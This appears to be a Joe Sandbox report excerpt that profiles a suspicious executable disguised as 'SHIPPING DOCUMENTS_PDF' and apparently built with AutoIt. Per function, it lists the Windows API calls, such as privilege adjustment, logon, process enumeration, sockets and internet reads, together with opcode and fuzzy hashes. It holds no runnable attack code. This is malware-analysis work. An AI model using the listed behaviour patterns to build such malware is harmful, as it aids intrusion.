                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ColorProc$LongWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3744519093-0
                                                                                    • Opcode ID: c994de4106ca1b47beb2229418d494dac0c7681a162c2cbea619e75eead501ad
                                                                                    • Instruction ID: a8dbffa92dc4e20053c4bf2f93b435cb6efddee5e006149c2e21d51a0fa49199
                                                                                    • Opcode Fuzzy Hash: c994de4106ca1b47beb2229418d494dac0c7681a162c2cbea619e75eead501ad
                                                                                    • Instruction Fuzzy Hash: B2A15A75106585BAEA2AAB3C8C94FBF25DCDB42343B1409DAFD12D21E2DA249D09D3B1
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00BBBCE6
                                                                                    • _wcscmp.LIBCMT ref: 00BBBD16
                                                                                    • _wcscmp.LIBCMT ref: 00BBBD2B
                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00BBBD3C
                                                                                    • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00BBBD6C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                    • String ID:
                                                                                    • API String ID: 2387731787-0
                                                                                    • Opcode ID: 3279ff22c237b10cffac593e363424036c452ef07ac2529b2555061b921cd1c0
                                                                                    • Instruction ID: 29fd0b929763af90461c4086537925d2bd0f1c4e3f50598b3c7a7c9eb7c22650
                                                                                    • Opcode Fuzzy Hash: 3279ff22c237b10cffac593e363424036c452ef07ac2529b2555061b921cd1c0
                                                                                    • Instruction Fuzzy Hash: 22516E356046029FC714DF68D491EAAB3E4EF49320F1446AEF966873A1DBB4ED04CB91
                                                                                    APIs
                                                                                      • Part of subcall function 00BC7D8B: inet_addr.WSOCK32(00000000), ref: 00BC7DB6
                                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 00BC679E
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00BC67C7
                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00BC6800
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00BC680D
                                                                                    • closesocket.WSOCK32(00000000), ref: 00BC6821
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                    • String ID:
                                                                                    • API String ID: 99427753-0
                                                                                    • Opcode ID: 0ba09b17cf2f15fe89ab6d6374c58f4e4d90f3696aeb850bc336d255b0023ad9
                                                                                    • Instruction ID: a224b9ecef3d0374be4b2c3a4b5abf5c287ad34550c02198098cd513e0ef4f91
                                                                                    • Opcode Fuzzy Hash: 0ba09b17cf2f15fe89ab6d6374c58f4e4d90f3696aeb850bc336d255b0023ad9
                                                                                    • Instruction Fuzzy Hash: 5D419D75A00210AFEB10BF248C86F6E77E89B45755F0484EDFD1AAB2D2DA709D048B91
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                    • String ID:
                                                                                    • API String ID: 292994002-0
                                                                                    • Opcode ID: 58eb10d48aafdb242512adaa2eeece0e01bbaf57b5de13bb844886b903c1e6ee
                                                                                    • Instruction ID: 6ff9671fe07c395d85a2638f7208fa9c9b8dd593bc5a55e2524b0e29aee8282e
                                                                                    • Opcode Fuzzy Hash: 58eb10d48aafdb242512adaa2eeece0e01bbaf57b5de13bb844886b903c1e6ee
                                                                                    • Instruction Fuzzy Hash: B911D0317019116BEB306F269C44B6AFBD8EF443A1B0040AAE847D7341EB70DD018AA8
                                                                                    APIs
                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00BA80C0
                                                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00BA80CA
                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00BA80D9
                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00BA80E0
                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00BA80F6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                    • String ID:
                                                                                    • API String ID: 44706859-0
                                                                                    • Opcode ID: fbfb880b4e5806fe84dd6c98a2fee5b2e07ee332648ff41966013ec9de4616f7
                                                                                    • Instruction ID: 6e240d5f171be7ceaf8789f93b3591090b795dd8bc73ecac4ea9c0e2fc98d23f
                                                                                    • Opcode Fuzzy Hash: fbfb880b4e5806fe84dd6c98a2fee5b2e07ee332648ff41966013ec9de4616f7
                                                                                    • Instruction Fuzzy Hash: 37F0C230209206BFEB100FA4EC8DE777BBCEF4A754B000026F906D3150DF609D01DA60
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00B54AD0), ref: 00B54B45
                                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00B54B57
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                    • API String ID: 2574300362-192647395
                                                                                    • Opcode ID: a502e4d6270b15bd2afff9ca21b4ae6444f007f17d0c360e6337944c2f1e0a92
                                                                                    • Instruction ID: 98cb5ba76f63fb4fb231ce95fea04c8512b2a12d62cc54742b1eaab546ee70f8
                                                                                    • Opcode Fuzzy Hash: a502e4d6270b15bd2afff9ca21b4ae6444f007f17d0c360e6337944c2f1e0a92
                                                                                    • Instruction Fuzzy Hash: 30D01234A14713CFD7209F31D868B16B6D4EF05355B1588BB9897D6260FB70D4C0C654
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: __itow__swprintf
• String ID:
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 00BCEE3D
• Process32FirstW.KERNEL32(00000000,?), ref: 00BCEE4B
  • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
• Process32NextW.KERNEL32(00000000,?), ref: 00BCEF0B
• CloseHandle.KERNEL32(00000000,?,?,?), ref: 00BCEF1A
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
• String ID:
Similarity
• API ID: BuffCharUpper
• String ID:
APIs
• lstrlenW.KERNEL32(?,?,?,00000000), ref: 00BAE628
Strings
Similarity
• API ID: lstrlen
• String ID: ($|
APIs
• InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00BC180A,00000000), ref: 00BC23E1
• InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00BC2418
Similarity
• API ID: Internet$AvailableDataFileQueryRead
• String ID:
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00BBB40B
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00BBB465
• SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00BBB4B2
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID:
APIs
  • Part of subcall function 00B70DB6: std::exception::exception.LIBCMT ref: 00B70DEC
  • Part of subcall function 00B70DB6: __CxxThrowException@8.LIBCMT ref: 00B70E01
• LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00BA882B
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00BA8858
• GetLastError.KERNEL32 ref: 00BA8865
Similarity
• API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
• String ID:
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00BA8774
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00BA878B
• FreeSid.ADVAPI32(?), ref: 00BA879B
Similarity
• API ID: AllocateCheckFreeInitializeMembershipToken
• String ID:
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 00BBC6FB
• FindClose.KERNEL32(00000000), ref: 00BBC72B
Similarity
• API ID: Find$CloseFileFirst
• String ID:
APIs
• GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00BC9468,?,00BDFB84,?), ref: 00BBA097
• FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00BC9468,?,00BDFB84,?), ref: 00BBA0A9
Similarity
• API ID: ErrorFormatLastMessage
• String ID:
APIs
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00BA8309), ref: 00BA81E0
• CloseHandle.KERNEL32(?,?,00BA8309), ref: 00BA81F2
                                                                                    Similarity
                                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                                    • String ID:
                                                                                    • API String ID: 81990902-0
APIs
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,00B78D57,?,?,?,00000001), ref: 00B7A15A
• UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00B7A163
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
APIs
• __time64.LIBCMT ref: 00BB889B
  • Part of subcall function 00B7520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00BB8F6E,00000000,?,?,?,?,00BB911F,00000000,?), ref: 00B75213
  • Part of subcall function 00B7520A: __aulldiv.LIBCMT ref: 00B75233
Similarity
• API ID: Time$FileSystem__aulldiv__time64
• String ID:
• API String ID: 2893107130-0
APIs
• mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00BB4C4A
Similarity
• API ID: mouse_event
• String ID:
• API String ID: 2434400541-0
APIs
• LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00BA8389), ref: 00BA87D1
Similarity
• API ID: LogonUser
• String ID:
• API String ID: 1244722697-0
APIs
• SetUnhandledExceptionFilter.KERNEL32(?), ref: 00B7A12A
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                    • Instruction ID: c6b82ca1cf05a7471c543d14db86c40b50865be8e2ded7f27863ea2399583739
                                                                                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                    • Instruction Fuzzy Hash: D8C1733220519309DF2D463D847513EBAE1DEA27B131A9BEDD4BBDB1C4EE20C965DA30
                                                                                    APIs
                                                                                    • DeleteObject.GDI32(00000000), ref: 00BC785B
                                                                                    • DeleteObject.GDI32(00000000), ref: 00BC786D
                                                                                    • DestroyWindow.USER32 ref: 00BC787B
                                                                                    • GetDesktopWindow.USER32 ref: 00BC7895
                                                                                    • GetWindowRect.USER32(00000000), ref: 00BC789C
                                                                                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00BC79DD
                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00BC79ED
                                                                                    • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC7A35
                                                                                    • GetClientRect.USER32(00000000,?), ref: 00BC7A41
                                                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00BC7A7B
                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC7A9D
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC7AB0
                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC7ABB
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00BC7AC4
                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC7AD3
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00BC7ADC
                                                                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC7AE3
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00BC7AEE
                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC7B00
                                                                                    • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00BE2CAC,00000000), ref: 00BC7B16
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00BC7B26
                                                                                    • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00BC7B4C
                                                                                    • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00BC7B6B
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC7B8D
                                                                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BC7D7A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                                    • API String ID: 2211948467-2373415609
                                                                                    • Opcode ID: 89ee713a66a7db44dd3abb089f052e0ad23cc225011de5afb4f2f04728a376b1
                                                                                    • Instruction ID: ba41fcd744fa0d64080f7f11bf7b8f0b048aa7b63ec934511768fd292f4f3774
                                                                                    • Opcode Fuzzy Hash: 89ee713a66a7db44dd3abb089f052e0ad23cc225011de5afb4f2f04728a376b1
                                                                                    • Instruction Fuzzy Hash: 12026A71900115EFDB14DFA4CC99EAEBBB9FB49310F1481A9F916AB2A0DB709D01CF60
                                                                                    APIs
                                                                                    • CharUpperBuffW.USER32(?,?,00BDF910), ref: 00BD3627
                                                                                    • IsWindowVisible.USER32(?), ref: 00BD364B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharUpperVisibleWindow
                                                                                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                    • API String ID: 4105515805-45149045
                                                                                    • Opcode ID: 34835623f42b29490abe5456953112150d05de53df162b130804800585e392c3
                                                                                    • Instruction ID: 1203d0394c2abd8baa39a332a360c0a21b234d7abca3e99a4e9f54411ee93462
                                                                                    • Opcode Fuzzy Hash: 34835623f42b29490abe5456953112150d05de53df162b130804800585e392c3
                                                                                    • Instruction Fuzzy Hash: DCD15E702187019BCA04EF10C456A6EB7E1EF55B54F1484EAF8965B3E3EB31DE0ACB52
                                                                                    APIs
                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00BDA630
                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00BDA661
                                                                                    • GetSysColor.USER32(0000000F), ref: 00BDA66D
                                                                                    • SetBkColor.GDI32(?,000000FF), ref: 00BDA687
                                                                                    • SelectObject.GDI32(?,00000000), ref: 00BDA696
                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00BDA6C1
                                                                                    • GetSysColor.USER32(00000010), ref: 00BDA6C9
                                                                                    • CreateSolidBrush.GDI32(00000000), ref: 00BDA6D0
                                                                                    • FrameRect.USER32(?,?,00000000), ref: 00BDA6DF
                                                                                    • DeleteObject.GDI32(00000000), ref: 00BDA6E6
                                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 00BDA731
                                                                                    • FillRect.USER32(?,?,00000000), ref: 00BDA763
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00BDA78E
                                                                                      • Part of subcall function 00BDA8CA: GetSysColor.USER32(00000012), ref: 00BDA903
                                                                                      • Part of subcall function 00BDA8CA: SetTextColor.GDI32(?,?), ref: 00BDA907
                                                                                      • Part of subcall function 00BDA8CA: GetSysColorBrush.USER32(0000000F), ref: 00BDA91D
                                                                                      • Part of subcall function 00BDA8CA: GetSysColor.USER32(0000000F), ref: 00BDA928
                                                                                      • Part of subcall function 00BDA8CA: GetSysColor.USER32(00000011), ref: 00BDA945
                                                                                      • Part of subcall function 00BDA8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00BDA953
                                                                                      • Part of subcall function 00BDA8CA: SelectObject.GDI32(?,00000000), ref: 00BDA964
                                                                                      • Part of subcall function 00BDA8CA: SetBkColor.GDI32(?,00000000), ref: 00BDA96D
                                                                                      • Part of subcall function 00BDA8CA: SelectObject.GDI32(?,?), ref: 00BDA97A
                                                                                      • Part of subcall function 00BDA8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 00BDA999
                                                                                      • Part of subcall function 00BDA8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00BDA9B0
                                                                                      • Part of subcall function 00BDA8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 00BDA9C5
                                                                                      • Part of subcall function 00BDA8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00BDA9ED
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                    • String ID:
                                                                                    • API String ID: 3521893082-0
                                                                                    • Opcode ID: 2177ca3ad1bfeb5748aff4fce3c14dcb909dfee15eabc82f044bef42c2e5b17b
                                                                                    • Instruction ID: d2da2d31ec493ff8b467935bbb80c93608f88d355a38ff54984dc53edadb479f
                                                                                    • Opcode Fuzzy Hash: 2177ca3ad1bfeb5748aff4fce3c14dcb909dfee15eabc82f044bef42c2e5b17b
                                                                                    • Instruction Fuzzy Hash: 77916F72409302EFC7109F64DC48A6BBBE9FB48325F144A2AF962971A0EB71D944CB52
                                                                                    APIs
                                                                                    • DestroyWindow.USER32(?,?,?), ref: 00B52CA2
                                                                                    • DeleteObject.GDI32(00000000), ref: 00B52CE8
                                                                                    • DeleteObject.GDI32(00000000), ref: 00B52CF3
                                                                                    • DestroyIcon.USER32(00000000,?,?,?), ref: 00B52CFE
                                                                                    • DestroyWindow.USER32(00000000,?,?,?), ref: 00B52D09
                                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 00B8C43B
                                                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00B8C474
                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00B8C89D
                                                                                      • Part of subcall function 00B51B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00B52036,?,00000000,?,?,?,?,00B516CB,00000000,?), ref: 00B51B9A
                                                                                    • SendMessageW.USER32(?,00001053), ref: 00B8C8DA
                                                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00B8C8F1
                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00B8C907
                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00B8C912
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                    • String ID: 0
                                                                                    • API String ID: 464785882-4108050209
                                                                                    • Opcode ID: 64ae7affe72a2ad6a817bd35cb05a8fb216b773d6c0584252a68b97c6856e45b
                                                                                    • Instruction ID: 53716d761b3c028f331b0d2f8d165062c9095c47c6d95b7663a5c24fd56fa7bb
                                                                                    • Opcode Fuzzy Hash: 64ae7affe72a2ad6a817bd35cb05a8fb216b773d6c0584252a68b97c6856e45b
